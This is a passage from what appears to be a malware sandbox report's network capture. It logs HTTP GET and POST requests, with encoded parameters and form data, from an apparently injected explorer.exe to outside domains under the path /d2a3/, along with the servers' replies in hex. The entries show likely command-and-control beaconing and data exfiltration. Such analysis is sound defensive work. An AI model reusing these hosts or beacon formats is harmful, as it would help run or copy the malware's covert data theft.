8c 56 06 f2 5a e3 84 bb 25 4f e2 ed 11 93 c5 b5 3d 9c 05 fb d1 c0 eb f9 a4 47 6c 3d d9 5a bc 3a 77 2e 0f 68 a3 be 13 c2 c9 ba af 69 99 af 4e e1 4f 39 38 c4 05 34 e8 78 72 e5 69 c5 80 5d 23 73 de a4 78 cb 8d b2 9d 1e aa c6 bc e3 66 f2 92 6b cd e6 c5 d2 33 e0 7e 6c ef 3c b8 dc 83 86 26 9c a3 ee c1 05 d5 70 3d 91 69 95 10 7a cc 0d 6a e6 de f2 66 b0 a7 77 dc 26 77 7d e0 a1 f3 79 0b de 93 75 a3 d1 27 6d 13 f8 fb aa f4 e1 a8 61 33 bb 8a 9f 8a 44 7b 64 0e f4 3a 1b c2 5e 02 84 8c 49 07 db 75 26 43 b0 ab b2 6c 31 48 70 12 91 14 a3 d7 8e d3 19 98 a2 c1 b6 ec 6d de 90 15 24 54 69 75 47 32 fb b2 d6 1d 48 f4 64 0f 5d 8b 75 44 25 4f a9 32 b2 53 4d 49 7d 24 7c ee 11 09 c3 fb d7 fb f5 b2 58 2c 8b e5 22 63 e5 40 aa 2a 25 70 41 cf aa 46 71 8c a1 4a a8 3d 53 62 9d c5 55 b3 54 d4 72 65 58 a3 b9 f7 eb 6c e4 90 8d 3b 5d 8d 1d 63 d6 77 b5 6f 9c b2 d1 82 b7 bd 12 3b 38 55 56 72 b1 b9 65 3f 43 cf 7e 27 b6 6f 22 5b 76 4f e2 be 20 0e 8b 53 cd 72 73 37 70 66 f7 c4 39 a6 96 4f 83 62 01 9f 26 d5 c1 9c 4b e7 ff 4d 3b 8d a4 4b 61 a5
                                                            Data Ascii: R]4}oHY:iW+r3]8DU8sn_~wLVofUa:vmfW.j!pfxlB4LXgAU'aTFKfpZcrh*hA)Na/[aw*c*SOS60u&ClOPk7eose}gLx:5pNC(O%_f>5ri)t3XC'kf547;yRHPcT"%I%ho)bq;ZLN_ZVm5:^E_{9*qZ%)d>OA4Q| 8~HbMm`5f^U7!`{a&FI`>23UwbLGEc<-A|YTVZ%O=Gl=Z:w.hiNO984xri]#sxfk3~l<&p=izjfw&w}yu'ma3D{d:^Iu&Cl1Hpm$TiuG2Hd]uD%O2SMI}$|X,"c@*%pAFqJ=SbUTreXl;]cwo;8UVre?C~'o"[vO Srs7pf9Ob&KM;Ka
                                                            Mar 20, 2023 11:27:51.819508076 CET101INData Raw: 7d 62 7e 2b 68 12 fb 31 26 46 f4 92 5f 4c 1b 42 b4 dd 29 58 95 51 8a 41 a6 29 5e 6d 11 e9 74 93 50 76 62 37 dc 70 3a ea 71 de 2d 23 ee 97 7c 27 fb 12 c5 c9 c2 8c 05 ee 48 b7 75 f6 b6 d6 dc 3c 66 e9 62 0c a2 05 03 8e 4e 8b 40 c0 b9 e1 b9 45 ad b1
                                                            Data Ascii: }b~+h1&F_LB)XQA)^mtPvb7p:q-#|'Hu<fbN@E6PqfP{`?x1a.g{U&z3P


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            10192.168.2.44970546.23.69.4480C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:37.254659891 CET115OUTGET /d2a3/?Mw=OjO/noXVMTk40sLqqWNUhETz5fwNQfL3iZv4zuTHX4FsBRg0F7vbWW3nqcxNlOGl4ZCA660VFsqTMG20zBTe2NhxC9mrQabZ6Q==&F7L99l=8qpwJ HTTP/1.1
                                                            Host: www.luxgudonu.store
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:28:37.346201897 CET116INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Mon, 20 Mar 2023 10:28:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 498
                                                            Connection: close
                                                            Last-Modified: Mon, 01 Dec 2014 15:11:20 GMT
                                                            Chimera-API-Server: api3.uk.chimera.uk2group.com
                                                            X-Powered-By: Perl Dancer 1.3513
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 3c 70 3e 53 6f 72 72 79 2c 20 74 68 69 73 20 69 73 20 74 68 65 20 76 6f 69 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 50 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 65 72 6c 64 61 6e 63 65 72 2e 6f 72 67 2f 22 3e 44 61 6e 63 65 72 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><title>Error 404</title><link rel="stylesheet" href="/css/error.css" /><meta http-equiv="Content-type" content="text/html; charset=UTF-8" /></head><body><h1>Error 404</h1><div id="content"><h2>Page Not Found</h2><p>Sorry, this is the void.</p></div><div id="footer">Powered by <a href="http://perldancer.org/">Dancer</a></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11192.168.2.44970637.97.254.2980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:42.432090998 CET117OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.sowmedia.site
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.sowmedia.site
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.sowmedia.site/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 6f 4b 41 2d 67 6c 70 52 43 31 42 37 39 34 74 4f 61 4c 7e 36 64 4f 37 65 77 2d 49 43 4f 30 7a 61 6b 6b 45 4d 66 38 65 72 61 64 74 48 34 78 4b 49 31 47 30 70 64 52 64 41 35 62 72 73 4a 4b 69 6a 6b 4f 65 45 50 4e 4d 42 39 64 67 63 4d 48 31 73 53 45 73 71 44 78 69 58 31 43 73 4f 39 56 58 69 59 6f 73 31 77 53 6a 50 28 77 59 51 6b 5f 4d 46 72 63 6c 6d 53 50 38 6e 62 42 46 50 57 4c 41 48 77 63 62 70 7a 49 34 75 28 62 79 5a 34 2d 7e 67 52 6a 4a 33 35 36 50 5f 61 33 75 45 65 56 48 38 48 64 52 6b 78 56 56 76 73 4a 55 49 6d 52 73 63 41 67 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=oKA-glpRC1B794tOaL~6dO7ew-ICO0zakkEMf8eradtH4xKI1G0pdRdA5brsJKijkOeEPNMB9dgcMH1sSEsqDxiX1CsO9VXiYos1wSjP(wYQk_MFrclmSP8nbBFPWLAHwcbpzI4u(byZ4-~gRjJ356P_a3uEeVH8HdRkxVVvsJUImRscAg).
                                                            Mar 20, 2023 11:28:42.458051920 CET117INHTTP/1.0 403 Forbidden
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12192.168.2.44970737.97.254.2980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:44.987210035 CET118OUTGET /d2a3/?F7L99l=8qpwJ&Mw=lIoejRloD0NPrvtjG56SffHGubt9bC7l7VozaPHGZoJbvkCik3wIcy97/aKLKqf+leC/SNQQ4bUyJkgTGWAXDnv4xxMA9hLjSw== HTTP/1.1
                                                            Host: www.sowmedia.site
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:28:45.015016079 CET119INHTTP/1.1 200 OK
                                                            Date: Tue, 06 Dec 2022 16:40:06 GMT
                                                            Server: Apache
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/html; charset=UTF-8
                                                            Cache-Control: max-age=31536000
                                                            X-Varnish: 929056234 44
                                                            Age: 8963318
                                                            Via: 1.1 varnish (Varnish/6.1)
                                                            Accept-Ranges: bytes
                                                            Content-Length: 636
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 65 69 6e 20 67 65 72 65 73 65 72 76 65 65 72 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 32 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 35 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 72 65 73 65 72 76 65 64 2e 3c 62 72 3e 0a 20 20 20 20 44 69 74 20 64 6f 6d 65 69 6e 20 69 73 20 67 65 72 65 73 65 72 76 65 65 72 64 2e 3c 62 72 3e 0a 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html><head> <meta charset="UTF-8"> <meta name="robots" content="noindex, nofollow"> <title>Domein gereserveerd</title> <style type="text/css"> div { position: absolute; top: 50%; left: 50%; width: 300px; height: 200px; margin-top: -30px; margin-left: -150px; text-align: center; font-family: Verdana, Arial, Helvetica, sans-serif; } </style></head><body><div> This domain has been reserved.<br> Dit domein is gereserveerd.<br> <br> </div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            13192.168.2.449708104.233.254.11380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:50.367239952 CET120OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.yh78898.com
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.yh78898.com
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.yh78898.com/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 79 70 50 62 75 6e 38 75 61 52 5a 32 59 74 32 46 6f 6f 73 78 71 5f 57 39 57 52 34 42 54 39 61 72 56 43 28 5f 64 72 77 75 65 2d 51 34 53 31 42 46 34 36 66 7a 75 44 30 37 50 4b 72 6d 58 4f 49 6b 43 30 77 31 47 52 6f 7a 4e 53 31 6a 37 6a 57 42 28 31 38 79 33 36 70 42 44 6d 7e 71 6a 5f 4b 37 45 30 39 4d 74 50 44 74 6d 69 6c 7a 62 41 6c 55 68 35 47 6d 6c 42 33 63 54 43 48 59 76 75 43 73 6e 57 55 52 70 41 64 35 61 4a 65 7a 73 33 74 42 56 70 50 38 4f 35 61 4a 61 59 35 4c 6a 68 55 39 6f 6c 76 79 70 43 65 5f 66 59 4e 43 57 32 54 65 38 41 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=ypPbun8uaRZ2Yt2Foosxq_W9WR4BT9arVC(_drwue-Q4S1BF46fzuD07PKrmXOIkC0w1GRozNS1j7jWB(18y36pBDm~qj_K7E09MtPDtmilzbAlUh5GmlB3cTCHYvuCsnWURpAd5aJezs3tBVpP8O5aJaY5LjhU9olvypCe_fYNCW2Te8A).
                                                            Mar 20, 2023 11:28:50.653989077 CET121INHTTP/1.1 404 Not Found
                                                            Cache-Control: private
                                                            Content-Type: text/html; charset=utf-8
                                                            Server: Microsoft-IIS/8.5
                                                            X-AspNet-Version: 4.0.30319
                                                            X-Powered-By: ASP.NET
                                                            Date: Mon, 20 Mar 2023 10:28:40 GMT
                                                            Connection: close
                                                            Content-Length: 1826
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74
                                                            Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
                                                            Mar 20, 2023 11:28:50.654407024 CET121INData Raw: 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f
                                                            Data Ascii: -weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verda
                                                            Mar 20, 2023 11:28:50.654957056 CET122INData Raw: 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66
                                                            Data Ascii: .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap
                                                            Mar 20, 2023 11:28:50.655349970 CET123INData Raw: 76 65 72 3e 3c 2f 48 31 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 20 3c 69 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 69 3e 20 3c 2f 68 32 3e 3c 2f 73 70 61 6e 3e 0d 0a 0d 0a 20 20 20 20 20 20 20
                                                            Data Ascii: ver></H1> <h2> <i></i> </h2></span> <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif "> <b> : </b>HTTP 404(


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            14192.168.2.449709104.233.254.11380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:53.219959021 CET123OUTGET /d2a3/?Mw=/rn7tSorYChcOKKpyJYvjsebDE1EetOtUlfXV6ATVt8jMTNnk8PtnAR6Iam3VdBxJXQPah1uBiYgzGnhkXQp6MgBOVaGh7iMCA==&F7L99l=8qpwJ HTTP/1.1
                                                            Host: www.yh78898.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:28:53.510878086 CET124INHTTP/1.1 404 Not Found
                                                            Cache-Control: private
                                                            Content-Type: text/html; charset=utf-8
                                                            Server: Microsoft-IIS/8.5
                                                            X-AspNet-Version: 4.0.30319
                                                            X-Powered-By: ASP.NET
                                                            Date: Mon, 20 Mar 2023 10:28:43 GMT
                                                            Connection: close
                                                            Content-Length: 1826
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74
                                                            Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font
                                                            Mar 20, 2023 11:28:53.511255026 CET124INData Raw: 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f
                                                            Data Ascii: -weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verda
                                                            Mar 20, 2023 11:28:53.511724949 CET125INData Raw: 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66
                                                            Data Ascii: .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; } @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap
                                                            Mar 20, 2023 11:28:53.512185097 CET126INData Raw: 76 65 72 3e 3c 2f 48 31 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 20 3c 69 3e e6 97 a0 e6 b3 95 e6 89 be e5 88 b0 e8 b5 84 e6 ba 90 e3 80 82 3c 2f 69 3e 20 3c 2f 68 32 3e 3c 2f 73 70 61 6e 3e 0d 0a 0d 0a 20 20 20 20 20 20 20
                                                            Data Ascii: ver></H1> <h2> <i></i> </h2></span> <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif "> <b> : </b>HTTP 404(


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.44969750.87.195.20380C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:27:54.098740101 CET101OUTGET /d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ HTTP/1.1
                                                            Host: www.motherhoodinthegarden.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Mar 20, 2023 11:27:54.881174088 CET102INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 20 Mar 2023 10:27:54 GMT
                                                            Server: nginx/1.21.6
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 0
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://motherhoodinthegarden.com/d2a3/?Mw=cN5AEPknHvfgRR2crmYFAZMRCOFajc7CFMghZAmOXZ6v62v+A/wOpED6FQaDJ/tGFUb6Y91ZfjLOaofoM8qmjHtlEGMmc9VxCg==&F7L99l=8qpwJ
                                                            host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                            X-Endurance-Cache-Level: 2
                                                            X-nginx-cache: WordPress
                                                            X-Server-Cache: true
                                                            X-Proxy-Cache: MISS


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.449698199.192.28.11080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Mar 20, 2023 11:28:10.139673948 CET104OUTPOST /d2a3/ HTTP/1.1
                                                            Host: www.getpay.life
                                                            Connection: close
                                                            Content-Length: 184
                                                            Cache-Control: no-cache
                                                            Origin: http://www.getpay.life
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://www.getpay.life/d2a3/
                                                            Accept-Language: en-US
                                                            Accept-Encoding: gzip, deflate
                                                            Data Raw: 4d 77 3d 59 53 7e 70 65 44 58 45 52 32 41 4a 75 4b 79 6c 6f 61 34 46 4b 63 36 66 62 59 6a 65 76 54 76 39 30 65 44 47 65 57 35 53 31 54 34 38 7a 48 34 74 35 70 44 6d 76 32 66 63 50 43 4f 51 59 35 50 72 66 76 37 76 5a 41 39 51 79 43 50 51 6a 58 64 6d 4b 48 43 42 67 2d 76 4a 55 64 50 68 6e 56 36 4e 79 68 45 4a 6a 54 6f 41 6f 7a 4f 72 6a 65 4a 52 54 33 78 70 28 52 37 4e 6f 2d 4d 53 47 57 33 64 69 6f 43 62 53 5a 37 69 52 7a 7a 50 63 56 41 6d 66 68 42 39 43 77 73 74 76 76 64 6e 4c 50 62 78 32 52 33 49 31 47 69 67 75 4a 59 76 36 74 42 73 63 67 29 2e 00 00 00 00 00 00 00 00
                                                            Data Ascii: Mw=YS~peDXER2AJuKyloa4FKc6fbYjevTv90eDGeW5S1T48zH4t5pDmv2fcPCOQY5Prfv7vZA9QyCPQjXdmKHCBg-vJUdPhnV6NyhEJjToAozOrjeJRT3xp(R7No-MSGW3dioCbSZ7iRzzPcVAmfhB9CwstvvdnLPbx2R3I1GiguJYv6tBscg).
                                                            Mar 20, 2023 11:28:10.410506964 CET105INHTTP/1.1 404 Not Found
                                                            Date: Mon, 20 Mar 2023 10:28:10 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 